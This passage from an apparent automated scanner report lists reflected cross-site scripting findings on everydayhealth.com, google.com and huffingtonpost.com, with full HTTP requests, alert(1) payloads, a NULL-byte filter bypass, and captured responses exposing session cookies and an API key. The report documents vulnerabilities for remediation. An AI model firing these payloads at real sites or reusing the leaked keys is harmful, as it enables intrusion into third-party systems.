Path:   /kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9361'%3b84c782d8b16 was submitted in the REST URL parameter 3. This input was echoed as a9361';84c782d8b16 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspxa9361'%3b84c782d8b16 HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Connection: close
Date: Thu, 05 May 2011 10:56:36 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpPEoo5s1MDkxMWEzZi0yMDZiLTRjYTAtYWNmNS0wZTY1YTU3ODg5ZjQ1; expires=Wed, 13-Jul-2011 21:36:36 GMT; path=/
Set-Cookie: ASP.NET_SessionId=xn1xydrmhljdevihanbstg45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16563


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<script> COMSCORE.beacon({ c1: 2, c2: '6035818', c3: '', c4: 'www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspxa9361';84c782d8b16', c5: '', c6: '', c15: ''});</script>
...[SNIP]...

2.13. http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.everydayhealth.com
Path:   /kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00a9efd"><script>alert(1)</script>8b47a959d8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a9efd"><script>alert(1)</script>8b47a959d8d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx?%00a9efd"><script>alert(1)</script>8b47a959d8d=1 HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:35 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpPBnhcM4ODI1YTExNS0xOGU4LTQwMDktOTliYi0wZGFlYzYyZDY0MGU1; expires=Wed, 13-Jul-2011 21:36:35 GMT; path=/
Set-Cookie: ASP.NET_SessionId=zln3ns55gb5bpcmolex34fm4; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49142


<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
   TVs Common in Daycare Centers Despite Guidelines - Kids' H
...[SNIP]...
<meta property="og:url" runat="server" id="fburl" content="http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx?%00a9efd"><script>alert(1)</script>8b47a959d8d=1" />
...[SNIP]...

2.14. http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.everydayhealth.com
Path:   /sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f526d'%3bb39bf44577d was submitted in the REST URL parameter 3. This input was echoed as f526d';b39bf44577d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspxf526d'%3bb39bf44577d HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Connection: close
Date: Thu, 05 May 2011 10:56:37 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpPID-ztmODA3YjBjZC03ZWNhLTRlNTQtODI4OS1lYTk2OWZjNDIxNzI1; expires=Wed, 13-Jul-2011 21:36:37 GMT; path=/
Set-Cookie: ASP.NET_SessionId=w3vie3btzynw5f451gmktxfe; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16651


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<script> COMSCORE.beacon({ c1: 2, c2: '6035818', c3: '', c4: 'www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspxf526d';b39bf44577d', c5: '', c6: '', c15: ''});</script>
...[SNIP]...

2.15. http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.everydayhealth.com
Path:   /sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d45e7"><script>alert(1)</script>ec06d481550 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d45e7"><script>alert(1)</script>ec06d481550 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx?%00d45e7"><script>alert(1)</script>ec06d481550=1 HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:36 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpPE-GLMyMDBhOGIyYi0wNTRiLTQ3ZmYtYTVhZC00MDg4M2QxNGVlMTM1; expires=Wed, 13-Jul-2011 21:36:36 GMT; path=/
Set-Cookie: ASP.NET_SessionId=jud0jt45dvf1vafmolehev55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47550


<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
   3 Ways to Put the Wow! Back in Your Sex Life - Sexual Heal
...[SNIP]...
<meta property="og:url" runat="server" id="fburl" content="http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx?%00d45e7"><script>alert(1)</script>ec06d481550=1" />
...[SNIP]...

2.16. http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.google.com
Path:   /advanced_search

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 77493(a)5729f6350b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advanced_search?77493(a)5729f6350b6=1 HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1303613395.1.1.utmcsr=xss.cx|utmccn=(referral)|utmcmd=referral|utmcct=/apptesting.aspx; __utma=173272373.620417115.1303613395.1303613395.1303613395.1; NID=46=Ba0U4da8P8fQA7x45DtUHYILglZeYGIGups8rg_DvVz_eZJte3UjlHF5LBgdHRELPDWgg_M2c4cfEuCb_MKRBOuEFsxKD3DPCgbNnbLWJ4NjJXl0O-Jy3456noCUlqNv; PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:57:38 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google Advanced Search</title><style id=gstyle>html{overflow-y:scroll}div,td,.n a,.n a:visited{color:#000}.ts td,.
...[SNIP]...
t()});
})();
;}catch(e){google.ml(e,false,{'cause':'defer'});}if(google.med) {google.med('init');google.initHistory();google.med('history');}google.History&&google.History.initialize('/advanced_search?77493(a)5729f6350b6\x3d1')});if(google.j&&google.j.en&&google.j.xi){window.setTimeout(google.j.xi,0);}</script>
...[SNIP]...

2.17. http://www.huffingtonpost.com/ [icid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /

Issue detail

The value of the icid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8739e"-alert(1)-"26ca8215966 was submitted in the icid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?icid=navbar_huffpo_main58739e"-alert(1)-"26ca8215966 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=29
Date: Thu, 05 May 2011 00:58:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 268951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
= 1;
   HPConfig.current_vertical_name = "homepage";
   HPConfig.current_vertical_id = -1;    
   HPConfig.current_web_address = "www.huffingtonpost.com";
HPConfig.current_uri = "/?icid=navbar_huffpo_main58739e"-alert(1)-"26ca8215966";
   HPConfig.inst_type = "prod";
   HPConfig.timestamp_for_clearing_js = "1304533217";
   HPConfig.bit_ly_key = {"user_name":"huffpost","user_key":"R_3db9b90fe8f78f0f2b180e72055462c8"};
   HPConfig.display_d
...[SNIP]...

2.18. http://www.huffingtonpost.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a79a"-alert(1)-"0ae47100ee4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?icid=navbar_huffpo_main5&7a79a"-alert(1)-"0ae47100ee4=1 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=30
Date: Thu, 05 May 2011 00:58:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 268938

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
= 1;
   HPConfig.current_vertical_name = "homepage";
   HPConfig.current_vertical_id = -1;    
   HPConfig.current_web_address = "www.huffingtonpost.com";
HPConfig.current_uri = "/?icid=navbar_huffpo_main5&7a79a"-alert(1)-"0ae47100ee4=1";
   HPConfig.inst_type = "prod";
   HPConfig.timestamp_for_clearing_js = "1304533217";
   HPConfig.bit_ly_key = {"user_name":"huffpost","user_key":"R_3db9b90fe8f78f0f2b180e72055462c8"};
   HPConfig.display
...[SNIP]...

2.19. http://www.huffingtonpost.com/2011/05/02/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /2011/05/02/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76498"-alert(1)-"978acabc995 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011/05/02/?76498"-alert(1)-"978acabc995=1 HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; geocity=Dallas; huffpo_type_views=%7B%2215%22%3A1%7D; is_aol_user=1; s_pers=%20s_getnr%3D1304578722710-Repeat%7C1367650722710%3B%20s_nrgvo%3DRepeat%7C1367650722712%3B; huffpost_adssale=n; __utma=265287574.457433518.1304575105.1304575105.1304578723.2; geostate=Texas; __utmc=265287574; __utmb=265287574.3.10.1304578723; __qca=P0-822287727-1304575116403; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 123154
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=277
Date: Thu, 05 May 2011 10:58:31 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
le_fb_widgets = 1;
   HPConfig.current_vertical_name = "homepage";
   HPConfig.current_vertical_id = -1;    
   HPConfig.current_web_address = "www.huffingtonpost.com";
HPConfig.current_uri = "/2011/05/02/?76498"-alert(1)-"978acabc995=1";
   HPConfig.inst_type = "prod";
   HPConfig.timestamp_for_clearing_js = "1304533217";
   HPConfig.bit_ly_key = {"user_name":"huffpost","user_key":"R_3db9b90fe8f78f0f2b180e72055462c8"};
   HPConfig.display
...[SNIP]...

2.20. http://www.huffingtonpost.com/2011/05/02/holocaust-memorial-day_n_856638.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /2011/05/02/holocaust-memorial-day_n_856638.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57a5e"-alert(1)-"d6ccc38ed4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011/05/02/holocaust-memorial-day_n_856638.html?57a5e"-alert(1)-"d6ccc38ed4b=1 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.14.9.1304575182212; s_pers=%20s_getnr%3D1304575182214-New%7C1367647182214%3B%20s_nrgvo%3DNew%7C1367647182216%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolhuffpo%252Caolsvc%253D%252526pid%25253Dhpo%25252520%2525253A%25252520Osama%25252520Bin%25252520Laden%25252520Pictures%25252520Will%25252520Not%25252520Be%25252520Released%2525252C%25252520Obama%25252520Decides%25252520%25252528UPDATED%25252529%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.huffingtonpost.com/2011/05/02/holocaust-memorial-day_n_856638.html%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Thu, 05 May 2011 01:00:54 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 05 May 2011 01:00:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 470003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...
ent_vertical_name = 'world';
   HPConfig.current_vertical_id = 15;    
   HPConfig.current_web_address = "www.huffingtonpost.com";
HPConfig.current_uri = "/2011/05/02/holocaust-memorial-day_n_856638.html?57a5e"-alert(1)-"d6ccc38ed4b=1";
   HPConfig.hp_static_domain = "s.huffpost.com";
   HPConfig.inst_type = "prod";
   HPConfig.timestamp_for_clearing_js = "1304533217";
   HPConfig.slideshow_individual_slide_link = false; // by default
   H
...[SNIP]...

2.21. http://www.huffingtonpost.com/2011/05/04/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /2011/05/04/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73665"-alert(1)-"b74fba3530f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011/05/04/?73665"-alert(1)-"b74fba3530f=1 HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; geocity=Dallas; huffpo_type_views=%7B%2215%22%3A1%7D; is_aol_user=1; s_pers=%20s_getnr%3D1304578722710-Repeat%7C1367650722710%3B%20s_nrgvo%3DRepeat%7C1367650722712%3B; huffpost_adssale=n; __utma=265287574.457433518.1304575105.1304575105.1304578723.2; geostate=Texas; __utmc=265287574; __utmb=265287574.3.10.1304578723; __qca=P0-822287727-1304575116403; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 140702
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=287
Date: Thu, 05 May 2011 10:58:33 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
le_fb_widgets = 1;
   HPConfig.current_vertical_name = "homepage";
   HPConfig.current_vertical_id = -1;    
   HPConfig.current_web_address = "www.huffingtonpost.com";
HPConfig.current_uri = "/2011/05/04/?73665"-alert(1)-"b74fba3530f=1";
   HPConfig.inst_type = "prod";
   HPConfig.timestamp_for_clearing_js = "1304533217";
   HPConfig.bit_ly_key = {"user_name":"huffpost","user_key":"R_3db9b90fe8f78f0f2b180e72055462c8"};
   HPConfig.display
...[SNIP]...

2.22. http://www.huffingtonpost.com/2011/05/04/cnn-poll-finds-that-most-_n_857597.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /2011/05/04/cnn-poll-finds-that-most-_n_857597.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 225fd"-alert(1)-"d892f95823f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011/05/04/cnn-poll-finds-that-most-_n_857597.html?225fd"-alert(1)-"d892f95823f=1 HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; geocity=Dallas; huffpo_type_views=%7B%2215%22%3A1%7D; is_aol_user=1; s_pers=%20s_getnr%3D1304578722710-Repeat%7C1367650722710%3B%20s_nrgvo%3DRepeat%7C1367650722712%3B; huffpost_adssale=n; __utma=265287574.457433518.1304575105.1304575105.1304578723.2; geostate=Texas; __utmc=265287574; __utmb=265287574.3.10.1304578723; __qca=P0-822287727-1304575116403; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 256534
Content-Type: text/html; charset=utf-8
Expires: Thu, 05 May 2011 10:58:56 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 05 May 2011 10:58:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...
t_vertical_name = 'media';
   HPConfig.current_vertical_id = 4;    
   HPConfig.current_web_address = "www.huffingtonpost.com";
HPConfig.current_uri = "/2011/05/04/cnn-poll-finds-that-most-_n_857597.html?225fd"-alert(1)-"d892f95823f=1";
   HPConfig.hp_static_domain = "s.huffpost.com";
   HPConfig.inst_type = "prod";
   HPConfig.timestamp_for_clearing_js = "1304533217";
   HPConfig.slideshow_individual_slide_link = false; // by default
   H
...[SNIP]...

